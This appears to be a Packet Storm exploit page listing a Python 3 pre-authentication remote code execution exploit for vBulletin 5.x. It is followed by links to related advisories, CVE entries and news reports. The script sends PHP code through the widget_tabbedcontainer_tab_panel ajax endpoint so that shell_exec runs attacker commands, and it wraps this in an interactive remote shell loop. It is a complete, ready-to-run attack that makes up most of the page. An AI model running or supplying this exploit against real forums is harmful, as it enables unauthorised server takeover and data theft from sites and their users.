Lucene search
ZenofexPACKETSTORM:158830HistoryAug 11, 2020 - 12:00 a.m.
vBulletin 5.x Remote Code Execution
2020-08-1100:00:00
Zenofex
packetstormsecurity.com
240
`#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget_tabbedContainer RCE exploit by @zenofex
import argparse
import requests
import sys
def run_exploit(vb_loc, shell_cmd):
post_data = {'subWidgets[0][template]' : 'widget_php',
'subWidgets[0][config][code]' : "echo shell_exec('%s'); exit;" % shell_cmd
}
r = requests.post('%s/ajax/render/widget_tabbedcontainer_tab_panel' % vb_loc, post_data)
return r.text
ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget Template RCE')
ap.add_argument('-l', '--location', required=True, help='Web address to root of vB5 install.')
ARGS = ap.parse_args()
while True:
try:
cmd = input("vBulletin5$ ")
print(run_exploit(ARGS.location, cmd))
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception as e:
sys.exit(str(e))
`
Related
prion
prion
Cross site request forgery (csrf)
2019-09-24 22:15:00
Design/Logic Flaw
2020-08-12 14:15:00
Design/Logic Flaw
2020-10-30 17:15:00
thn
thn
Hackers Breach ZoneAlarm's Forum Site β Outdated vBulletin to Blame
2019-11-11 15:27:00
attackerkb
attackerkb
CVE-2019-16759
2019-09-24 00:00:00
CVE-2020-12720 vBulletin incorrect access control
2020-05-08 00:00:00
CVE-2020-17496
2020-08-12 00:00:00
githubexploit
githubexploit
Exploit for Code Injection in Vbulletin
2020-08-24 16:15:10
Exploit for Code Injection in Vbulletin
2019-09-26 03:27:17
Exploit for Code Injection in Vbulletin
2019-09-26 03:56:22
nessus
nessus
vBulletin 'widget_php' Command Execution
2019-10-23 00:00:00
threatpost
threatpost
vBulletin Flaw Exploited in Dutch Sex-Work Forum Breach
2019-10-10 20:37:40
Rash of Exploits Targets Critical vBulletin RCE Bug
2019-09-26 17:45:03
Researcher Publishes Patch Bypass for vBulletin 0-Day
2020-08-11 12:09:30
packetstorm
packetstorm
vBulletin 5.x Pre-Auth Remote Code Execution
2019-09-28 00:00:00
vBulletin 5.x 0-Day Pre-Auth Remote Command Execution
2019-09-26 00:00:00
vBulletin 5.x Remote Code Execution
2020-08-11 00:00:00
openvas
openvas
zdt
zdt
vBulletin 5.6.2 - (widget_tabbedContainer_tab_panel) Remote Code Execution Exploit
2020-08-12 00:00:00
vBulletin 5.5.4 Remote Command Execution Exploit #RCE
2019-12-11 00:00:00
vBulletin 5.x - Remote Command Execution Exploit
2019-10-01 00:00:00
impervablog
impervablog
Attackers Are Quick to Exploit vBulletinβs Latest 0-day Remote Code Execution Vulnerability
2019-09-26 13:43:30
CrimeOps of the KashmirBlack Botnet β Part II
2020-10-22 18:55:05
cve
cve
canvas
canvas
Immunity Canvas: VBULLETIN_WIDGET_RCE
2019-09-24 22:15:00
exploitdb
exploitdb
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
2020-08-12 00:00:00
vBulletin 5.x - Remote Command Execution (Metasploit)
2019-09-30 00:00:00
metasploit
metasploit
exploitpack
exploitpack
vBulletin 5.x - Remote Command Execution (Metasploit)
2019-09-30 00:00:00
cisa_kev
cisa_kev
vBulletin PHP Module Remote Code Execution Vulnerability
2021-11-03 00:00:00
vBulletin PHP Module Remote Code Execution Vulnerability
2021-11-03 00:00:00
mssecure
mssecure
Ghost in the shell: Investigating web shell attacks
2020-02-04 17:30:40
nuclei
nuclei
vBulletin 5.5.4 - 5.6.2- Remote Command Execution
2021-02-24 20:00:52
vBulletin 5.0.0-5.5.4 - Remote Command Execution
2020-07-04 15:56:10
checkpoint_advisories
checkpoint_advisories
vBulletin Forum Remote Code Execution (CVE-2019-16759; CVE-2020-17496)
2019-09-25 00:00:00
qualysblog
qualysblog
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR
2022-02-23 05:39:00
Related for PACKETSTORM:158830